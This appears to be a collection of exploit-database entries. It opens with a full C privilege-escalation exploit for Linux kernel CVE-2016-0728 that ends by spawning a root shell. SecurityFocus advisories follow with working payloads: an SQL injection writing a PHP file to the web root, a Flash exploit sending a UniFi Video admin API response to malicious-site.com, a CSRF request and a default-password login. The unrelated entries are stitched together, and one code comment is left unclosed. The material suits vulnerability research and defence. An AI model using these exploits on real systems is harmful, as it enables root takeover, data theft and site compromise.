# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings

# Date: 19/1/2016

# Exploit Author: Perception Point Team

# CVE : CVE-2016-0728

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <sys/types.h>

#include <keyutils.h>

#include <unistd.h>

#include <time.h>

#include <unistd.h>

#include <sys/ipc.h>

#include <sys/msg.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (*

_prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

#define STRUCT_LEN (0xb8 - 0x30)

#define COMMIT_CREDS_ADDR (0xffffffff810bb050)

#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)

struct key_type {

char * name;

size_t datalen;

void * vet_description;

void * preparse;

void * free_preparse;

void * instantiate;

void * update;

void * match_preparse;

void * match_free;

void * revoke;

void * destroy;

};

static unsigned long get_kernel_sym(char *name)

{

FILE *f;

unsigned long addr;

char dummy;

char sname[256];

int ret;

f = fopen("/proc/kallsyms", "r");

if (f == NULL) {

fprintf(stdout, "Unable to obtain symbol listing!\n");

exit(0);

}

ret = 0;

while(ret != EOF) {

ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);

if (ret == 0) {

fscanf(f, "%s\n", sname);

continue;

}

if (!strcmp(name, sname)) {

fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);

fclose(f);

return addr;

}

}

fclose(f);

return 0;

}

void userspace_revoke(void * key) {

commit_creds(prepare_kernel_cred(0));

}

int main(int argc, const char *argv[]) {

const char *keyring_name;

size_t i = 0;

unsigned long int l = 0x100000000/2;

key_serial_t serial = -1;

pid_t pid = -1;

struct key_type * my_key_type = NULL;

struct {

long mtype;

char mtext[STRUCT_LEN];

} msg = {0x4141414141414141, {0}};

int msqid;

if (argc != 2) {

puts("usage: ./keys <key_name>");

return 1;

}

printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());

commit_creds = (_commit_creds)get_kernel_sym("commit_creds");

prepare_kernel_cred =

(_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");

if(commit_creds == NULL || prepare_kernel_cred == NULL) {

commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;

prepare_kernel_cred =

(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;

if(commit_creds == (_commit_creds)0xffffffff810bb050

|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)

puts("[-] You probably need to change the address of

commit_creds and prepare_kernel_cred in source");

}

my_key_type = malloc(sizeof(*my_key_type));

my_key_type->revoke = (void*)userspace_revoke;

memset(msg.mtext, 'A', sizeof(msg.mtext));

// key->uid

*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */

//key->perm

*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;

//key->type

*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;

if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {

perror("msgget");

exit(1);

}

keyring_name = argv[1];

/* Set the new session keyring before we start */

serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);

if (serial < 0) {

perror("keyctl");

return -1;

}

if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL |

KEY_GRP_ALL | KEY_OTH_ALL) < 0) {

perror("keyctl");

return -1;

}

puts("[+] Increfing...");

for (i = 1; i < 0xfffffffd; i++) {

if (i == (0xffffffff - l)) {

l = l/2;

sleep(5);

}

if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {

perror("[-] keyctl");

return -1;

}

}

sleep(5);

/* here we are going to leak the last references to overflow */

for (i=0; i<5; ++i) {

if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {

perror("[-] keyctl");

return -1;

}

}

puts("[+] Finished increfing");

puts("[+] Forking...");

/* allocate msg struct in the kernel rewriting the freed keyring

for (i=0; i<64; i++) {

pid = fork();

if (pid == -1) {

perror("[-] fork");

return -1;

}

if (pid == 0) {

sleep(2);

if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {

perror("[-] msgget");

exit(1);

}

for (i = 0; i < 64; i++) {

if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {

perror("[-] msgsnd");

exit(1);

}

}

sleep(-1);

exit(1);

}

}

puts("[+] Finished forking");

sleep(5);

/* call userspace_revoke from kernel */

puts("[+] Caling revoke...");

if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {

perror("[+] keyctl_revoke");

}

printf("uid=%d, euid=%d\n", getuid(), geteuid());

execl("/bin/sh", "/bin/sh", NULL);

return 0;

}

source: http://www.securityfocus.com/bid/68843/info

Ilya Birman E2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

E2 v2844 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/@actions/comment-process" method="post" name="main">

<input type="hidden" name="already-subscribed" value="">

<input type="hidden" name="comment-id" value="new">

<input type="hidden" name="elton-john" value="1">

<input type="hidden" name="email" value="mail@mail.com">

<input type="hidden" name="from" value="">

<input type="hidden" name="name" value="name">

<input type="hidden" name="subscribe" value="on">

<input type="hidden" name="text" value="1">

<input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">

<input type="submit" id="btn">

source: http://www.securityfocus.com/bid/68866/info

UniFi Video is prone to a security-bypass vulnerability.

An authenticated attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.

UniFi Video 2.1.3 is vulnerable; other versions may also be affected.

package {

import flash.display.Sprite;

import flash.events.*;

import flash.net.URLRequestMethod;

import flash.net.URLRequest;

import flash.net.URLLoader;

import flash.net.URLRequestHeader;

public class XDomainXploit3 extends Sprite {

public function XDomainXploit3() {

// Target URL from where the data is to be retrieved

var readFrom:String = "https//www.example.com:7443/api/2.0/admin";

var header:URLRequestHeader = new URLRequestHeader("Content-Type",

"text/plain; charset=UTF-8");

var readRequest:URLRequest = new URLRequest(readFrom);

readRequest.method = URLRequestMethod.POST

readRequest.data =

"{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@gmail.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";

readRequest.requestHeaders.push(header);

var getLoader:URLLoader = new URLLoader();

getLoader.addEventListener(Event.COMPLETE, eventHandler);

try {

getLoader.load(readRequest);

} catch (error:Error) {

trace("Error loading URL: " + error);

}

}

private function eventHandler(event:Event):void {

// URL to which retrieved data is to be sent

var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php"

var sendRequest:URLRequest = new URLRequest(sendTo);

sendRequest.method = URLRequestMethod.POST;

sendRequest.data = event.target.data;

var sendLoader:URLLoader = new URLLoader();

try {

sendLoader.load(sendRequest);

} catch (error:Error) {

trace("Error loading URL: " + error);

}

}

}

}

source: http://www.securityfocus.com/bid/68934/info

The Lead Octopus Power plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=[SQL]

source: http://www.securityfocus.com/bid/68954/info

WhyDoWork AdSense plugin for WordPress is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or perform unauthorized actions. Other attacks may also be possible.

WhyDoWork AdSense plugin 1.2 and prior are vulnerable.

POST URL:

http://www.example.com/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1

Host: www.example.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101

Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: es-co

Accept-Encoding: gzip, deflate

Referer:

http://www.example.com/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1

Cookie:

wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=hacking%7C1406766762%7C0a0ccdb16a9d99c2b9113e25e2ea6b8d;

wp-settings-time-1=1406489836;

wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse;

wordpress_test_cookie=WP+Cookie+check;

wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=loreleitaron%7C1406766762%7C667e59a36d4254c8a178580770ac5135

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 843

CONTENIDO POST:

idx=1&whydowork_code=tets&whydowork_exclude=&whydowork_front_code_1=FALSE&whydowork_front_pos_1=top&whydowork_front_post_1=1&whydowork_front_code_2=FALSE&whydowork_front_pos_2=top&whydowork_front_post_2=1&whydowork_front_code_3=FALSE&whydowork_front_pos_3=top&whydowork_front_post_3=1&whydowork_page_code_1=FALSE&whydowork_page_pos_1=top&whydowork_page_code_2=FALSE&whydowork_page_pos_2=top&whydowork_page_code_3=FALSE&whydowork_page_pos_3=top&whydowork_single_code_1=FALSE&whydowork_single_pos_1=top&whydowork_single_code_2=FALSE&whydowork_single_pos_2=top&whydowork_single_code_3=FALSE&whydowork_single_pos_3=top&whydowork_singleold_code_1=FALSE&whydowork_singleold_pos_1=top&whydowork_singleold_code_2=FALSE&whydowork_singleold_pos_2=top&whydowork_singleold_code_3=FALSE&whydowork_singleold_pos_3=top&whydowork_adsense_oldday=&Submit=Update

source: http://www.securityfocus.com/bid/68961/info

CMSimple is prone to multiple security vulnerabilities including:

1. Multiple arbitrary PHP code-execution vulnerabilities

2. A weak authentication security-bypass vulnerability

3. Multiple security vulnerabilities

An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks.

Any user can login just with simple password "test" which is the default cms password & there own vendor site is vulnerable with weak authentication

just login without user name & also with default password "test" here "http://cmsimple.org/2author/?Welcome_to_CMSimple&login"